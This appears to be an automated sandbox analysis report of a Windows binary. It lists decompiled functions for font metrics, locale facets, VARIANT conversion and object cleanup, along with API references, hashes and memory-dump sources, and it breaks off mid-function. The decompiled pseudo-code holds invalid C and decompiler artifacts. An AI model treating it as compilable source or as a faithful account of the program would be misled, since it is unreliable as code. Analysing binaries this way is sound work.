                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetStockObject.GDI32(00000011), ref: 0127E1C0
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 0127E1C8
                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 0127E1D5
                                                                                                                • GetDC.USER32(00000000), ref: 0127E1E4
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0127E1FB
                                                                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 0127E207
                                                                                                                • ReleaseDC.USER32 ref: 0127E213
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                • String ID: System
                                                                                                                • API String ID: 46613423-3470857405
                                                                                                                • Opcode ID: 1ff5a17d7b8b890ffa6c5392408fb364a8a485358cc6ec04979f81176dc7a033
                                                                                                                • Instruction ID: 2324f15bfcda3eb52435b0db86cb6a39f1b4d4f52e542f14267b5e34720b9d3e
                                                                                                                • Opcode Fuzzy Hash: 1ff5a17d7b8b890ffa6c5392408fb364a8a485358cc6ec04979f81176dc7a033
                                                                                                                • Instruction Fuzzy Hash: B5119071A50319ABEF249BA8ED49FBF7BA8EB04751F00005DFA01A72C4DA709D01C770
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100137D2, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100137D9
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 100137E3
                                                                                                                  • Part of subcall function 100612C6: __lock.LIBCMT ref: 100612D7
                                                                                                                • int.LIBCPMT ref: 100137FA
                                                                                                                  • Part of subcall function 100018BA: std::_Lockit::_Lockit.LIBCPMT ref: 100018CB
                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 10013803
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 10013831
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1001383F
                                                                                                                • std::_Facet_Register.LIBCPMT ref: 10013855
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prolog3RegisterThrow__lockstd::bad_exception::bad_exceptionstd::locale::_
                                                                                                                • String ID: bad cast
                                                                                                                • API String ID: 1501143699-3145022300
                                                                                                                • Opcode ID: a9ec0bd9c613461bd017455597f6581b619591f3d9e305cb4812ba1922430927
                                                                                                                • Instruction ID: e4081b90dbfe604daba21afdb30bde08871f30555e2c1d13d1b0c7c3a565ac3f
                                                                                                                • Opcode Fuzzy Hash: a9ec0bd9c613461bd017455597f6581b619591f3d9e305cb4812ba1922430927
                                                                                                                • Instruction Fuzzy Hash: F001DE3AC006259BCB01DBA0CC91AED33B5FF04760F508519F910BB291EF34EE418B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128044A, Relevance: 13.8, APIs: 9, Instructions: 259COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E0128044A(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed short _t124;
				intOrPtr _t125;
				signed short _t137;
				signed int _t139;
				signed short _t140;
				signed short* _t141;
				signed short* _t147;
				intOrPtr _t148;
				signed int _t150;
				signed short* _t151;
				void* _t152;
				signed short* _t155;
				signed short* _t158;
				signed int _t162;
				signed short _t165;
				signed int _t168;
				intOrPtr _t179;
				signed short _t182;
				void* _t192;
				signed short* _t193;
				signed short* _t196;
				signed short _t200;
				signed int _t201;
				signed short _t206;
				signed short _t207;
				signed short _t209;
				intOrPtr _t210;
				void* _t211;
				signed short _t212;
				signed short _t214;
				long long _t219;

				_push(0x5c);
				E01285C19(E012982BC, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t211 - 0x38)) = __ecx;
				E01269011(_t211 - 0x15,  *((intOrPtr*)(__ecx + 0x1c)));
				_t182 = 0;
				 *(_t211 - 4) = 0;
				 *(_t211 - 0x1d) = 0;
				_t206 =  *( *((intOrPtr*)(_t211 + 8)) + 8);
				if(_t206 == 0) {
					_t206 = _t211 - 0x1d;
				}
				_t124 = E01283900(_t206);
				_t217 =  *(_t211 + 0xc) & 0x0000000c;
				_t209 = _t124;
				_t125 =  *((intOrPtr*)(_t211 + 8));
				 *((intOrPtr*)(_t211 - 0x28)) =  *((intOrPtr*)(_t125 + 0x10));
				 *(_t211 - 0x34) =  *(_t125 + 0xc) & 0x0000ffff;
				if(( *(_t211 + 0xc) & 0x0000000c) == 0) {
					_t209 =  *(_t211 - 0x34);
					 *(_t211 - 0x2c) = 8;
					L9:
					_push( *( *((intOrPtr*)(_t211 + 0x14)) + 8) << 4);
					_t130 = E01269565(_t182, _t206, _t209, __eflags);
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						 *(_t211 - 4) =  *(_t211 - 4) | 0xffffffff;
						E01269AE8(_t130);
						L50:
						return E01285B6B(_t182, _t206, _t209);
					}
					_t130 =  *( *((intOrPtr*)(_t211 + 0x14)) + 8);
					__eflags = _t130 - 0x7ffffff;
					if(_t130 > 0x7ffffff) {
						goto L4;
					}
					 *(_t211 - 0x24) = _t130 << 4;
					E01286360(_t130 << 4);
					_t137 = _t212;
					 *(_t211 - 0x10) = _t212;
					 *(_t211 - 0x30) = _t137;
					 *(_t211 - 0x50) = _t137;
					E01283870(_t137, _t182,  *(_t211 - 0x24));
					_t214 = _t212 + 0xc;
					_push(_t209);
					_t139 = E01280863(_t206);
					 *(_t211 - 0x24) = _t139;
					_t140 = _t139 + 0x10;
					_push(_t140);
					 *(_t211 - 0x1c) = _t140;
					_t141 = E01269565(_t182, _t206, _t209, __eflags);
					__eflags = _t141;
					if(_t141 != 0) {
						E01286360( *(_t211 - 0x1c));
						 *(_t211 - 0x10) = _t214;
						 *(_t211 - 0x1c) = _t214;
						E0128028F(_t211 - 0x64);
						_push(_t211 - 0x64);
						_push( *(_t211 - 0x30));
						 *(_t211 - 4) = 1;
						_push( *((intOrPtr*)(_t211 + 0x18)));
						_push( *((intOrPtr*)(_t211 + 0x14)));
						_push(_t209);
						_push(_t211 - 0x48);
						_push(_t206);
						_t207 =  *(_t211 - 0x1c);
						_push(_t207);
						_t147 = E01280A4D(_t182,  *((intOrPtr*)(_t211 - 0x38)), _t207, _t209, __eflags);
						 *(_t211 - 0x4c) = _t147;
						 *(_t211 - 0x1c) = _t182;
						__eflags = _t147;
						if(_t147 != 0) {
							L23:
							_t148 =  *((intOrPtr*)(_t211 + 0x14));
							_t206 = __imp__#9;
							__eflags =  *((intOrPtr*)(_t148 + 8)) - _t182;
							if( *((intOrPtr*)(_t148 + 8)) <= _t182) {
								L27:
								_t182 =  *(_t211 - 0x4c);
								_t192 = _t211 - 0x64;
								__eflags = _t182;
								if(_t182 == 0) {
									E012807BA(_t148, _t182, _t192, _t206, _t209);
									_t193 =  *(_t211 + 0x10);
									_t150 = _t209 & 0x0000ffff;
									__eflags = _t193;
									if(_t193 == 0) {
										_t151 = _t150 -  *(_t211 - 0x2c);
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#6( *(_t211 - 0x1c));
											L49:
											_t152 = E01280340(_t211 - 0x64, _t206);
											 *(_t211 - 4) =  *(_t211 - 4) | 0xffffffff;
											E01269AE8(_t152);
											__eflags = 0;
											goto L50;
										}
										_t155 = _t151 - 1;
										__eflags = _t155;
										if(_t155 == 0) {
											L45:
											_t196 =  *(_t211 - 0x1c);
											__eflags = _t196;
											if(_t196 != 0) {
												 *((intOrPtr*)( *_t196 + 8))(_t196);
											}
											goto L49;
										}
										_t158 = _t155 - 3;
										__eflags = _t158;
										if(_t158 == 0) {
											 *_t206(_t211 - 0x48);
											goto L49;
										}
										__eflags = _t158 != 1;
										if(_t158 != 1) {
											goto L49;
										}
										goto L45;
									}
									_t162 = _t150 + 0xfffffffe;
									 *_t193 = _t209;
									__eflags = _t162 - 0x13;
									if(_t162 > 0x13) {
										goto L49;
									}
									switch( *((intOrPtr*)(_t162 * 4 +  &M0128076A))) {
										case 0:
											 *((short*)(__ecx + 8)) = __dx;
											goto L49;
										case 1:
											 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ebp - 0x1c));
											goto L49;
										case 2:
											 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ebp - 0x48));
											goto L49;
										case 3:
											 *((long long*)(__ecx + 8)) =  *((long long*)(__ebp - 0x48));
											goto L49;
										case 4:
											__eax =  *((intOrPtr*)(__ebp - 0x48));
											 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ebp - 0x48));
											__eax =  *((intOrPtr*)(__ebp - 0x44));
											 *((intOrPtr*)(__ecx + 0xc)) =  *((intOrPtr*)(__ebp - 0x44));
											goto L49;
										case 5:
											__eax = 0;
											__eflags = __dx;
											0 | __eflags == 0x00000000 = (0 | __eflags == 0x00000000) - 1;
											 *((short*)(__ecx + 8)) = __ax;
											goto L49;
										case 6:
											__edi = __ecx;
											__esi = __ebp - 0x48;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L49;
										case 7:
											goto L49;
										case 8:
											_t193[4] =  *(_t211 - 0x1c);
											goto L49;
									}
								}
								_t141 = E01280340(_t192, _t206);
								L29:
								 *(_t211 - 4) =  *(_t211 - 4) | 0xffffffff;
								E01269AE8(_t141);
								goto L50;
							}
							_t210 = _t148;
							_t165 =  *(_t211 - 0x30);
							do {
								 *_t206(_t165);
								_t182 = _t182 + 1;
								_t165 =  *(_t211 - 0x30) + 0x10;
								 *(_t211 - 0x30) = _t165;
								__eflags = _t182 -  *((intOrPtr*)(_t210 + 8));
							} while (_t182 <  *((intOrPtr*)(_t210 + 8)));
							_t209 =  *(_t211 - 0x34);
							goto L27;
						}
						_push( *(_t211 - 0x24));
						_t168 = _t209 & 0x0000ffff;
						 *(_t211 - 4) = 2;
						_push(_t207);
						_push( *((intOrPtr*)(_t211 - 0x28)));
						__eflags = _t168 - 4;
						if(_t168 == 4) {
							E01282C0A();
							 *((intOrPtr*)(_t211 - 0x38)) = _t219;
							 *((intOrPtr*)(_t211 - 0x48)) =  *((intOrPtr*)(_t211 - 0x38));
							L22:
							 *(_t211 - 4) = 1;
							goto L23;
						}
						__eflags = _t168 - 5;
						if(_t168 == 5) {
							L20:
							E01282C0A();
							 *((long long*)(_t211 - 0x48)) = _t219;
							goto L22;
						}
						__eflags = _t168 - 7;
						if(_t168 == 7) {
							goto L20;
						}
						__eflags = _t168 + 0xffffffec - 1;
						if(_t168 + 0xffffffec > 1) {
							 *(_t211 - 0x1c) = E01282C0A();
						} else {
							 *((intOrPtr*)(_t211 - 0x48)) = E01282C0A();
							 *(_t211 - 0x44) = _t201;
						}
						goto L22;
					}
					_t182 = 0x8007000e;
					goto L29;
				}
				_t17 = _t209 + 3; // 0x3
				if(E01269565(_t182, _t206, _t209, _t217) != 0) {
					_t21 = _t209 + 3; // 0x3
					E01286360(_t21);
					 *(_t211 - 0x10) = _t212;
					_t23 = _t209 + 3; // 0x3
					 *(_t211 - 0x2c) = _t212;
					E01266A63(_t23, _t212, _t23, _t206, _t209);
					_t179 =  *((intOrPtr*)(_t211 + 8));
					_t212 = _t212 + 0x10;
					_t200 =  *(_t211 - 0x2c);
					_t206 = _t200;
					 *(_t211 - 0x2c) = 8;
					_t201 =  *(_t179 + 0xc) & 0x0000ffff;
					__eflags = _t201 -  *(_t211 - 0x2c);
					if(__eflags == 0) {
						_t201 = 0xe;
					}
					 *((char*)(_t200 + _t209)) = 0xff;
					 *(_t200 + _t209 + 1) = _t201;
					 *(_t200 + _t209 + 2) = _t182;
					_t209 = _t182;
					 *((intOrPtr*)(_t211 - 0x28)) =  *((intOrPtr*)(_t179 + 0x14));
					 *(_t211 - 0x34) = _t209;
					goto L9;
				}
				goto L4;
			}


































                                                                                                                0x0128044a
                                                                                                                0x01280451
                                                                                                                0x01280458
                                                                                                                0x01280461
                                                                                                                0x01280469
                                                                                                                0x0128046b
                                                                                                                0x0128046e
                                                                                                                0x01280471
                                                                                                                0x01280476
                                                                                                                0x01280478
                                                                                                                0x01280478
                                                                                                                0x0128047c
                                                                                                                0x01280481
                                                                                                                0x01280485
                                                                                                                0x01280487
                                                                                                                0x01280492
                                                                                                                0x01280495
                                                                                                                0x01280498
                                                                                                                0x01280512
                                                                                                                0x01280515
                                                                                                                0x0128051c
                                                                                                                0x01280525
                                                                                                                0x01280526
                                                                                                                0x0128052c
                                                                                                                0x0128052e
                                                                                                                0x012804a8
                                                                                                                0x012804a8
                                                                                                                0x012804af
                                                                                                                0x0128075f
                                                                                                                0x01280767
                                                                                                                0x01280767
                                                                                                                0x01280537
                                                                                                                0x0128053a
                                                                                                                0x0128053f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01280548
                                                                                                                0x0128054b
                                                                                                                0x01280550
                                                                                                                0x01280552
                                                                                                                0x01280558
                                                                                                                0x0128055d
                                                                                                                0x01280560
                                                                                                                0x01280565
                                                                                                                0x01280568
                                                                                                                0x0128056a
                                                                                                                0x0128056f
                                                                                                                0x01280572
                                                                                                                0x01280575
                                                                                                                0x01280576
                                                                                                                0x01280579
                                                                                                                0x0128057f
                                                                                                                0x01280581
                                                                                                                0x01280590
                                                                                                                0x01280598
                                                                                                                0x0128059b
                                                                                                                0x0128059e
                                                                                                                0x012805a9
                                                                                                                0x012805aa
                                                                                                                0x012805b0
                                                                                                                0x012805b4
                                                                                                                0x012805b7
                                                                                                                0x012805ba
                                                                                                                0x012805bb
                                                                                                                0x012805bc
                                                                                                                0x012805bd
                                                                                                                0x012805c0
                                                                                                                0x012805c1
                                                                                                                0x012805c6
                                                                                                                0x012805c9
                                                                                                                0x012805cc
                                                                                                                0x012805ce
                                                                                                                0x0128062b
                                                                                                                0x0128062b
                                                                                                                0x0128062e
                                                                                                                0x01280634
                                                                                                                0x01280637
                                                                                                                0x01280653
                                                                                                                0x01280653
                                                                                                                0x01280656
                                                                                                                0x01280659
                                                                                                                0x0128065b
                                                                                                                0x0128069f
                                                                                                                0x012806a4
                                                                                                                0x012806a7
                                                                                                                0x012806aa
                                                                                                                0x012806ac
                                                                                                                0x01280718
                                                                                                                0x01280718
                                                                                                                0x0128071b
                                                                                                                0x01280743
                                                                                                                0x01280749
                                                                                                                0x0128074c
                                                                                                                0x01280751
                                                                                                                0x01280758
                                                                                                                0x0128075d
                                                                                                                0x00000000
                                                                                                                0x0128075d
                                                                                                                0x0128071d
                                                                                                                0x0128071d
                                                                                                                0x0128071e
                                                                                                                0x01280728
                                                                                                                0x01280728
                                                                                                                0x0128072b
                                                                                                                0x0128072d
                                                                                                                0x01280732
                                                                                                                0x01280732
                                                                                                                0x00000000
                                                                                                                0x0128072d
                                                                                                                0x01280720
                                                                                                                0x01280720
                                                                                                                0x01280723
                                                                                                                0x0128073b
                                                                                                                0x00000000
                                                                                                                0x0128073b
                                                                                                                0x01280725
                                                                                                                0x01280726
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01280726
                                                                                                                0x012806ae
                                                                                                                0x012806b1
                                                                                                                0x012806b4
                                                                                                                0x012806b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012806bd
                                                                                                                0x00000000
                                                                                                                0x012806cf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01280713
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012806e6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012806ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012806d5
                                                                                                                0x012806d8
                                                                                                                0x012806db
                                                                                                                0x012806de
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012806f6
                                                                                                                0x012806f8
                                                                                                                0x012806fe
                                                                                                                0x012806ff
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01280705
                                                                                                                0x01280707
                                                                                                                0x0128070a
                                                                                                                0x0128070b
                                                                                                                0x0128070c
                                                                                                                0x0128070d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012806c7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012806bd
                                                                                                                0x0128065d
                                                                                                                0x01280662
                                                                                                                0x01280662
                                                                                                                0x01280669
                                                                                                                0x00000000
                                                                                                                0x0128066e
                                                                                                                0x01280639
                                                                                                                0x0128063b
                                                                                                                0x0128063e
                                                                                                                0x0128063f
                                                                                                                0x01280644
                                                                                                                0x01280645
                                                                                                                0x01280648
                                                                                                                0x0128064b
                                                                                                                0x0128064b
                                                                                                                0x01280650
                                                                                                                0x00000000
                                                                                                                0x01280650
                                                                                                                0x012805d0
                                                                                                                0x012805d3
                                                                                                                0x012805d6
                                                                                                                0x012805da
                                                                                                                0x012805db
                                                                                                                0x012805de
                                                                                                                0x012805e1
                                                                                                                0x01280616
                                                                                                                0x0128061b
                                                                                                                0x01280621
                                                                                                                0x01280624
                                                                                                                0x01280624
                                                                                                                0x00000000
                                                                                                                0x01280624
                                                                                                                0x012805e3
                                                                                                                0x012805e6
                                                                                                                0x0128060c
                                                                                                                0x0128060c
                                                                                                                0x01280611
                                                                                                                0x00000000
                                                                                                                0x01280611
                                                                                                                0x012805e8
                                                                                                                0x012805eb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012805f0
                                                                                                                0x012805f3
                                                                                                                0x01280607
                                                                                                                0x012805f5
                                                                                                                0x012805fa
                                                                                                                0x012805fd
                                                                                                                0x012805fd
                                                                                                                0x00000000
                                                                                                                0x012805f3
                                                                                                                0x01280583
                                                                                                                0x00000000
                                                                                                                0x01280583
                                                                                                                0x0128049a
                                                                                                                0x012804a6
                                                                                                                0x012804be
                                                                                                                0x012804c1
                                                                                                                0x012804c8
                                                                                                                0x012804cd
                                                                                                                0x012804d0
                                                                                                                0x012804d5
                                                                                                                0x012804da
                                                                                                                0x012804dd
                                                                                                                0x012804e0
                                                                                                                0x012804e3
                                                                                                                0x012804e5
                                                                                                                0x012804ec
                                                                                                                0x012804f0
                                                                                                                0x012804f4
                                                                                                                0x012804f8
                                                                                                                0x012804f8
                                                                                                                0x012804f9
                                                                                                                0x012804fd
                                                                                                                0x01280501
                                                                                                                0x01280505
                                                                                                                0x0128050a
                                                                                                                0x0128050d
                                                                                                                0x00000000
                                                                                                                0x0128050d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 01280451
                                                                                                                • _strlen.LIBCMT ref: 0128047C
                                                                                                                • __alloca_probe_16.LIBCMT ref: 012804C1
                                                                                                                  • Part of subcall function 01266A63: _memcpy_s.LIBCMT ref: 01266A72
                                                                                                                • __alloca_probe_16.LIBCMT ref: 0128054B
                                                                                                                • _memset.LIBCMT ref: 01280560
                                                                                                                • __alloca_probe_16.LIBCMT ref: 01280590
                                                                                                                  • Part of subcall function 01280A4D: __EH_prolog3.LIBCMT ref: 01280A54
                                                                                                                  • Part of subcall function 01280A4D: VariantChangeType.OLEAUT32(?,?,00000000,0000000E), ref: 01280B1A
                                                                                                                  • Part of subcall function 01280A4D: SysFreeString.OLEAUT32(?), ref: 01280B4D
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0128063F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16$Variant$ChangeClearFreeH_prolog3H_prolog3_catch_StringType_memcpy_s_memset_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4040776095-0
                                                                                                                • Opcode ID: 37961ce70e1a1137f48a511d009cf5666f5390175be6dc1922e8abf32915fda8
                                                                                                                • Instruction ID: 40c01f8d889197234563803171bad4ff4b6611767454f7cfacd35dd1c649b492
                                                                                                                • Opcode Fuzzy Hash: 37961ce70e1a1137f48a511d009cf5666f5390175be6dc1922e8abf32915fda8
                                                                                                                • Instruction Fuzzy Hash: 90A18A70C2220ADFDF14EFA8D4809AEBBB4FF14314F248159F519AB291D771A94ACF64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01263596, Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E01263596(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t40;
				int _t41;
				void* _t42;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t77;
				intOrPtr* _t78;
				intOrPtr _t82;
				void* _t83;

				_push(0x214);
				E01285C19(E01296D77, __ebx, __edi, __esi);
				_t82 = __ecx;
				 *((intOrPtr*)(_t83 - 0x21c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1299910;
				 *(_t83 - 4) = 0;
				 *(_t83 - 4) = 1;
				E01264F62(__ecx);
				if( *((intOrPtr*)(__ecx + 0xbc)) != 0) {
					__imp__CoUninitialize();
					 *((intOrPtr*)(__ecx + 0xbc)) = 0;
				}
				_t71 =  *((intOrPtr*)(_t82 + 0x5c));
				if(_t71 != 0) {
					 *((intOrPtr*)( *_t71 + 4))(1);
				}
				_t72 =  *((intOrPtr*)(_t82 + 0x8c));
				if(_t72 != 0) {
					 *((intOrPtr*)( *_t72 + 0x1c))(1);
				}
				_t73 =  *((intOrPtr*)(_t82 + 0x90));
				_t90 = _t73;
				if(_t73 != 0) {
					 *((intOrPtr*)( *_t73 + 4))(1);
				}
				if( *((char*)(E012692A5(1, 0, _t82, _t90) + 0x14)) == 0) {
					_t77 =  *0x1388054; // 0x0
					if(_t77 != 0) {
						 *((intOrPtr*)( *_t77 + 4))(1);
						 *0x1388054 = 0;
					}
					_t78 =  *0x1388058; // 0x0
					if(_t78 != 0) {
						 *((intOrPtr*)( *_t78 + 4))(1);
						 *0x1388058 = 0;
					}
				}
				if( *((intOrPtr*)(_t82 + 0x74)) != 0) {
					E0126FDC2( *((intOrPtr*)(_t82 + 0x74)));
				}
				if( *((intOrPtr*)(_t82 + 0x78)) != 0) {
					E0126FDC2( *((intOrPtr*)(_t82 + 0x78)));
				}
				_t40 =  *(_t82 + 0x98) & 0x0000ffff;
				_t69 = GlobalDeleteAtom;
				if(_t40 != 0) {
					GlobalDeleteAtom(_t40);
				}
				_t41 =  *(_t82 + 0x9a) & 0x0000ffff;
				if(_t41 != 0) {
					GlobalDeleteAtom(_t41);
				}
				_t74 =  *((intOrPtr*)(_t82 + 0x94));
				_t98 = _t74;
				if(_t74 != 0) {
					 *((intOrPtr*)( *_t74 + 4))("true");
				}
				_t42 = E012692A5(_t69, 0, _t82, _t98);
				if( *((intOrPtr*)(_t42 + 0x10)) ==  *((intOrPtr*)(_t82 + 0x50))) {
					 *((intOrPtr*)(_t42 + 0x10)) = 0;
				}
				if( *((intOrPtr*)(_t42 + 4)) == _t82) {
					 *((intOrPtr*)(_t42 + 4)) = 0;
				}
				E012833F4( *((intOrPtr*)(_t82 + 0x50)));
				E012833F4( *((intOrPtr*)(_t82 + 0x58)));
				E012833F4( *((intOrPtr*)(_t82 + 0x64)));
				E012833F4( *((intOrPtr*)(_t82 + 0x68)));
				E012833F4( *((intOrPtr*)(_t82 + 0x6c)));
				 *((intOrPtr*)(_t82 + 0x2c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
				E01266AB8(_t69, _t82, 0, _t82,  *(_t83 - 4));
				return E01285B6B(_t69, 0, _t82);
			}















                                                                                                                0x01263596
                                                                                                                0x012635a0
                                                                                                                0x012635a5
                                                                                                                0x012635a7
                                                                                                                0x012635ad
                                                                                                                0x012635b7
                                                                                                                0x012635bb
                                                                                                                0x012635be
                                                                                                                0x012635c9
                                                                                                                0x012635cb
                                                                                                                0x012635d1
                                                                                                                0x012635d1
                                                                                                                0x012635d7
                                                                                                                0x012635dc
                                                                                                                0x012635e1
                                                                                                                0x012635e1
                                                                                                                0x012635e4
                                                                                                                0x012635ec
                                                                                                                0x012635f1
                                                                                                                0x012635f1
                                                                                                                0x012635f4
                                                                                                                0x012635fa
                                                                                                                0x012635fc
                                                                                                                0x01263601
                                                                                                                0x01263601
                                                                                                                0x0126360d
                                                                                                                0x0126360f
                                                                                                                0x01263617
                                                                                                                0x0126361c
                                                                                                                0x0126361f
                                                                                                                0x0126361f
                                                                                                                0x01263625
                                                                                                                0x0126362d
                                                                                                                0x01263632
                                                                                                                0x01263635
                                                                                                                0x01263635
                                                                                                                0x0126362d
                                                                                                                0x0126363f
                                                                                                                0x01263644
                                                                                                                0x01263644
                                                                                                                0x0126364d
                                                                                                                0x01263652
                                                                                                                0x01263652
                                                                                                                0x01263657
                                                                                                                0x0126365e
                                                                                                                0x01263667
                                                                                                                0x0126366a
                                                                                                                0x0126366a
                                                                                                                0x0126366c
                                                                                                                0x01263676
                                                                                                                0x01263679
                                                                                                                0x01263679
                                                                                                                0x0126367b
                                                                                                                0x01263681
                                                                                                                0x01263683
                                                                                                                0x01263689
                                                                                                                0x01263689
                                                                                                                0x0126368c
                                                                                                                0x01263697
                                                                                                                0x01263699
                                                                                                                0x01263699
                                                                                                                0x0126369f
                                                                                                                0x012636a1
                                                                                                                0x012636a1
                                                                                                                0x012636a7
                                                                                                                0x012636af
                                                                                                                0x012636b7
                                                                                                                0x012636bf
                                                                                                                0x012636c7
                                                                                                                0x012636cf
                                                                                                                0x0126378a
                                                                                                                0x01263790
                                                                                                                0x0126379a

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$AtomDeleteGlobal$H_prolog3_catch_Uninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 4252385502-0
                                                                                                                • Opcode ID: b273885ee12e90d1a1ef3d333f58842339bfc018340f33664549a71a19faff73
                                                                                                                • Instruction ID: 4424eb36b408d0d321214497def5b4b2cccbad105c68de85c0955e5ca69c7c21
                                                                                                                • Opcode Fuzzy Hash: b273885ee12e90d1a1ef3d333f58842339bfc018340f33664549a71a19faff73
                                                                                                                • Instruction Fuzzy Hash: E4416FB0611742DFEB25EF39C944A6ABBE8BF54704F04485D925A976E1CB31D881CF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012707FA, Relevance: 13.6, APIs: 9, Instructions: 101memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E012707FA(void* __ebx, long __ecx, void* __edi, void* __esi, void* __eflags) {
				long* _t40;
				long _t41;
				void* _t42;
				long _t50;
